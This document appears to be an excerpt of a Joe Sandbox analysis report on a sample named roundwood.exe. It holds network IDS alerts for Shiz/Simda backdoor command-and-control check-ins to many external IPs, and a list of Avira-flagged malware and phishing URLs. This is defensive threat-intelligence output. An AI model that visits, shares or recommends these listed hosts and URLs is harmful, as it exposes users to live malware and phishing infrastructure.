Severity:	1
Source Port:	59537
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:43:03.704038+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	64700
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:43:47.172572+0200
SID:	2803437
Severity:	1
Source Port:	50844
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:43:47.172572+0200
SID:	2804852
Severity:	1
Source Port:	50844
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:42:17.944239+0200
SID:	2804852
Severity:	1
Source Port:	49723
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:50.959353+0200
SID:	2803437
Severity:	1
Source Port:	50842
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:50.959353+0200
SID:	2804852
Severity:	1
Source Port:	50842
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:42:17.939719+0200
SID:	2803437
Severity:	1
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:42:17.939719+0200
SID:	2804852
Severity:	1
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:43:35.007208+0200
SID:	2803437
Severity:	1
Source Port:	59529
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:43:35.007208+0200
SID:	2804852
Severity:	1
Source Port:	59529
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 15.197.240.20

Timestamp:	2024-08-23T18:44:16.499388+0200
SID:	2803437
Severity:	1
Source Port:	61322
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 15.197.240.20

Timestamp:	2024-08-23T18:44:16.499388+0200
SID:	2804852
Severity:	1
Source Port:	61322
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:42:12.851519+0200
SID:	2803437
Severity:	1
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:42:12.851519+0200
SID:	2804852
Severity:	1
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 15.197.240.20

Timestamp:	2024-08-23T18:43:27.748480+0200
SID:	2803437
Severity:	1
Source Port:	63535
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 15.197.240.20

Timestamp:	2024-08-23T18:43:27.748480+0200
SID:	2804852
Severity:	1
Source Port:	63535
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:44:05.642374+0200
SID:	2803437
Severity:	1
Source Port:	50850
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:44:05.642374+0200
SID:	2804852
Severity:	1
Source Port:	50850
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz - Source IP: 18.208.156.248 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:12.969833+0200
SID:	2018141
Severity:	1
Source Port:	80
Destination Port:	49713
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 18.208.156.248 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:12.969833+0200
SID:	2037771
Severity:	1
Source Port:	80
Destination Port:	49713
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:12.051514+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	50783
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:43:35.030592+0200
SID:	2803437
Severity:	1
Source Port:	59533
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:43:35.030592+0200
SID:	2804852
Severity:	1
Source Port:	59533
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:42:28.454333+0200
SID:	2803437
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:42:28.454333+0200
SID:	2804852
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 3.94.10.34

Timestamp:	2024-08-23T18:43:35.027988+0200
SID:	2803437
Severity:	1
Source Port:	59535
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 3.94.10.34

Timestamp:	2024-08-23T18:43:35.027988+0200
SID:	2804852
Severity:	1
Source Port:	59535
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:11.847367+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	61390
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:42:28.191275+0200
SID:	2803437
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:42:28.191275+0200
SID:	2804852
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:44:04.518140+0200
SID:	2803437
Severity:	1
Source Port:	50849
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:44:04.518140+0200
SID:	2804852
Severity:	1
Source Port:	50849
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:43:36.838567+0200
SID:	2803437
Severity:	1
Source Port:	59541
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:43:36.838567+0200
SID:	2804852
Severity:	1
Source Port:	59541
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:43:42.376596+0200
SID:	2803437
Severity:	1
Source Port:	59531
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:43:42.376596+0200
SID:	2804852
Severity:	1
Source Port:	59531
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:43:35.062846+0200
SID:	2803437
Severity:	1
Source Port:	59537
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:43:35.062846+0200
SID:	2804852
Severity:	1
Source Port:	59537
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:42:16.708223+0200
SID:	2803437
Severity:	1
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:42:16.708223+0200
SID:	2804852
Severity:	1
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:43:03.299572+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	62489
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:49.269857+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	63105
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:43:46.683786+0200
SID:	2803437
Severity:	1
Source Port:	50843
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:43:46.683786+0200
SID:	2804852
Severity:	1
Source Port:	50843
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:42:47.735451+0200
SID:	2803437
Severity:	1
Source Port:	60684
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:42:47.735451+0200
SID:	2804852
Severity:	1
Source Port:	60684
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 15.197.240.20

Timestamp:	2024-08-23T18:43:17.172160+0200
SID:	2803437
Severity:	1
Source Port:	63520
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 15.197.240.20

Timestamp:	2024-08-23T18:43:17.172160+0200
SID:	2804852
Severity:	1
Source Port:	63520
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:43:35.200911+0200
SID:	2803437
Severity:	1
Source Port:	59529
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:43:35.200911+0200
SID:	2804852
Severity:	1
Source Port:	59529
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:42:25.750815+0200
SID:	2803437
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:42:25.750815+0200
SID:	2804852
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:00.681002+0200
SID:	2803437
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:00.681002+0200
SID:	2804852
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-08-23T18:43:35.779967+0200
SID:	2804852
Severity:	1
Source Port:	59540
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:42:12.931770+0200
SID:	2803437
Severity:	1
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:42:12.931770+0200
SID:	2804852
Severity:	1
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:44:06.065128+0200
SID:	2803437
Severity:	1
Source Port:	50851
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:44:06.065128+0200
SID:	2804852
Severity:	1
Source Port:	50851
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:43:34.336361+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	57825
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:43:29.163916+0200
SID:	2803437
Severity:	1
Source Port:	62685
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:43:29.163916+0200
SID:	2804852
Severity:	1
Source Port:	62685
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:35.089912+0200
SID:	2803437
Severity:	1
Source Port:	59530
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:35.089912+0200
SID:	2804852
Severity:	1
Source Port:	59530
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:42:27.546643+0200
SID:	2803437
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:42:27.546643+0200
SID:	2804852
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 103.224.182.252

Timestamp:	2024-08-23T18:43:07.469104+0200
SID:	2803437
Severity:	1
Source Port:	63522
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 103.224.182.252

Timestamp:	2024-08-23T18:43:07.469104+0200
SID:	2804852
Severity:	1
Source Port:	63522
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:43:08.051046+0200
SID:	2803437
Severity:	1
Source Port:	63521
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:43:08.051046+0200
SID:	2804852
Severity:	1
Source Port:	63521
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:42:46.926972+0200
SID:	2803437
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:42:46.926972+0200
SID:	2804852
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:42:47.479722+0200
SID:	2803437
Severity:	1
Source Port:	60684
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:42:47.479722+0200
SID:	2804852
Severity:	1
Source Port:	60684
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 199.191.50.83

Timestamp:	2024-08-23T18:42:14.001355+0200
SID:	2803437
Severity:	1
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 199.191.50.83

Timestamp:	2024-08-23T18:42:14.001355+0200
SID:	2804852
Severity:	1
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:43:54.017141+0200
SID:	2803437
Severity:	1
Source Port:	59547
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:43:54.017141+0200
SID:	2804852
Severity:	1
Source Port:	59547
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:36.643118+0200
SID:	2803437
Severity:	1
Source Port:	59530
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:36.643118+0200
SID:	2804852
Severity:	1
Source Port:	59530
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:42:13.036411+0200
SID:	2803437
Severity:	1
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:42:13.036411+0200
SID:	2804852
Severity:	1
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:43:33.519751+0200
SID:	2803437
Severity:	1
Source Port:	60101
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:43:33.519751+0200
SID:	2804852
Severity:	1
Source Port:	60101
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz - Source IP: 52.34.198.229 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:43:31.677081+0200
SID:	2018141
Severity:	1
Source Port:	80
Destination Port:	49369
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 52.34.198.229 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:43:31.677081+0200
SID:	2037771
Severity:	1
Source Port:	80
Destination Port:	49369
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: roundwood.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ww16.vofycot.com/login.php?sub1=20240824-0243-077d-8f61-d4c58a818681	Avira URL Cloud: Label: malware
Source: http://ww25.lyxynyx.com/login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcb	Avira URL Cloud: Label: malware
Source: http://lyvyxor.com/login.php	Avira URL Cloud: Label: malware
Source: http://galyqaz.com/Printing_Machines.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsfisSsLM8y	Avira URL Cloud: Label: malware
Source: http://puzylyp.com/login.phpA:	Avira URL Cloud: Label: malware
Source: http://ww1.lysyfyj.com/	Avira URL Cloud: Label: phishing
Source: http://ww25.lyxynyx.com/login.php?subid1=20240824-0243-071d-8c4b-3f42cf5256c3co	Avira URL Cloud: Label: malware
Source: http://lyrysor.com/login.php	Avira URL Cloud: Label: phishing
Source: http://puzylyp.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyxynyx.com/login.php	Avira URL Cloud: Label: malware
Source: http://ww16.vofycot.com/login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60	Avira URL Cloud: Label: malware
Source: http://qegyval.com/login.php29	Avira URL Cloud: Label: malware
Source: http://vojyqem.com/login.php	Avira URL Cloud: Label: malware
Source: http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&	Avira URL Cloud: Label: malware
Source: http://galynuh.com/login.php	Avira URL Cloud: Label: malware
Source: http://qetyhyg.com/login.php	Avira URL Cloud: Label: phishing
Source: http://lyxynyx.com/login.php3	Avira URL Cloud: Label: malware
Source: http://lymyxid.com/login.php	Avira URL Cloud: Label: malware
Source: http://galyqaz.com/display.cfm	Avira URL Cloud: Label: malware
Source: http://gadyniw.com/login.php	Avira URL Cloud: Label: malware
Source: http://qegyval.com/login.php	Avira URL Cloud: Label: malware
Source: http://pupydeq.com/login.php	Avira URL Cloud: Label: malware
Source: http://lygyvuj.com/login.php	Avira URL Cloud: Label: phishing
Source: http://galyqaz.com/Commercial_Printing_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUG	Avira URL Cloud: Label: malware
Source: http://ww1.lysyfyj.com/?fp=ZbSrv2i18YnNfPNSqSsC6n0jQLvcDPBy65hKrYcVeZdyOk55NkMmURDujLfYrzEMz5BE5QmQN	Avira URL Cloud: Label: phishing
Source: http://galyqaz.com/Printing_Inks.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsfisSsLM8yGzAG	Avira URL Cloud: Label: malware
Source: http://ww6.galyqaz.com/GlobalSign	Avira URL Cloud: Label: malware
Source: http://gadyciz.com/login.php	Avira URL Cloud: Label: malware
Source: http://ww1.lysyfyj.com/t	Avira URL Cloud: Label: malware
Source: http://ww25.lyxynyx.com/login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcbser-AgentMozilla/4.0	Avira URL Cloud: Label: malware
Source: http://gatyfus.com/login.phpcom/login.php	Avira URL Cloud: Label: malware
Source: http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cC	Avira URL Cloud: Label: malware
Source: http://gatyhub.com/login.php	Avira URL Cloud: Label: malware
Source: https://lysyvan.com/	Avira URL Cloud: Label: malware
